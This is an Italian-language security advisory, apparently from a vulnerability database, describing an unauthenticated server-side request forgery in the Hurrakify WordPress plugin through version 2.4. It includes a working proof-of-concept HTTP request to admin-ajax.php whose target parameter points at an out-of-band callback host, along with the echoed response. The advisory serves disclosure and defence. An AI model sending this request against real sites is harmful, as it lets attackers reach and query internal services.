
Hurrakify <= 2.4 - Server-Side Request Forgery non autenticato
Hurrakify <= 2.4 - Server-Side Request Forgery non autenticata
Il plugin Hurrakify per WordPress è vulnerabile a Server-Side Request Forgery in tutte le versioni fino alla 2.4 inclusa. Ciò consente ad attaccanti non autenticati di effettuare richieste web verso destinazioni arbitrarie originate dall'applicazione web, che possono essere utilizzate per interrogare e modificare informazioni dai servizi interni.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>